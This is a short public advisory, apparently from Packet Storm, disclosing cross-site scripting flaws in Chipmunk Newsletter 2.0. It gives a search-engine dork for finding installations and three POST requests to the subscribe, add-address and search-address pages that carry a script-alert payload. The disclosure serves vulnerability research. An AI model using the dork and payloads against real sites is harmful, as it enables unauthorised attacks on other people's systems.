Chipmunk news version 2.0 suffers from cross site scripting vulnerabilities.
1a7514898635ae897044cd042b55cbcf726734c49336957080185ba5a1a99863dadf# Title: Chipmunk Newsletter XSS Vulnerabilities
# Date: 01-19-2010
# Author: b0telh0
# Software Link: http://www.chipmunk-scripts.com/newsletter/newsletter.zip
# Version: 2.0
# Tested on: Windows 7
Another XSS on Chipmunk Newsletter...
Thanks to mr_me who found the first flaw on it!
::[ inurl:admin/login.php "Registering Admin" ]::
1 - http://localhost/sub.php
POSTDATA:
email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit
2 - http://localhost/admin/addaddress.php
POSTDATA:
email=<script>alert('xss')</script>&lists=1&submit=submit
then we can check it...
http://localhost/admin/searchaddress.php
POSTDATA:
theaddress=<script>alert('xss')</script>&submit=submit
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed